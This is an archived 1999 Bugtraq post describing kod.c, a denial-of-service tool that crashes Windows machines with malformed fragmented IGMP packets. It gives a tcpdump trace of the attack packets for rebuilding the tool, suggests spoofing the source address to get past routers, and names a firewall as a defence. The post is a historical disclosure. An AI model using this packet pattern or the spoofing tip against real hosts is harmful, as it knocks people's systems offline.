Bugtraq mailing list archives
more detail and summary of kod.c (igmp bug for windows)
From: klepto () LEVITATE NET (klepto)
Date: Thu, 15 Jul 1999 00:32:08 -0500
Ok, here we go again.. For those who are having trouble with kod, alot of you are using a very old version which was the first i submitted. inserted is the lastest version which should work. I wrote kod.c aka cherrycoke.c about 3-4 months ago. It sends a fragmented igmp packet to a windows client that states that it is not fragmented but there are more frags to come windows assembles the packets and dies trying. Here is a dump of the packet if you want to rewrite it. /* output via tcpdump or windump95 63.66.66.44 > 24.128.158.18: igmp-2 [v0][|igmp] (frag 52242:63.66.66.44 > 24.128.158.18: igmp-2 [v0][|igmp] (frag 52242:1480@0+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@1480+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@2960+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@4440+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@5920+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@7400+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@8880+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@10360+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@11840+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@13320+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:1480@14800+) (ttl 128) 63.66.66.44 > 24.128.158.18: (frag 52242:63.66.66.44 > 24.128.158.18: (frag 52242:120@16280) (ttl 128) */ ::notice the last frag it changed length.. I have also ported kod to windows and please email me if you want a copy of it. As far as I can tell due to my exaustive research on the subject it works on 95/98/98se/2k(some betas) Friends of mine such as defile/nyt/ignitor/etc have rewritten kod to suit there needs.. I have tested kod.c out alot on many machines and it works 85% of the time for me. There are circumstances to why kod doesn't always work, some routers my drop igmp packets if the source isn't local so try spoofing =). As far as I can see netcom and alot of .ca servers drop the kod packets. So please dont bark at me =) I just found the bug, wrote the code and what you do with it is your concern =). Patch: (no hotfix currently) If you want to protect yourself from kod.c I suggest you get winroute from www.winroute.com get version 4.. It automatically drops igmp packets incoming and outgoing ha =) It is also a very good portmapper/NAT firewall/ip masqer as well.. Shoutouts: amputee/ignitor/nizda/antibyte/codelogic/ill`/chord/cheesebal/traveler/winx/naz/dist/mrcide/etc... (gotta give shoutouts) hasta, klepto@Efnet or klepto () levitate net de omnibus dubitandum
Current thread:
- more detail and summary of kod.c (igmp bug for windows) klepto (Jul 14)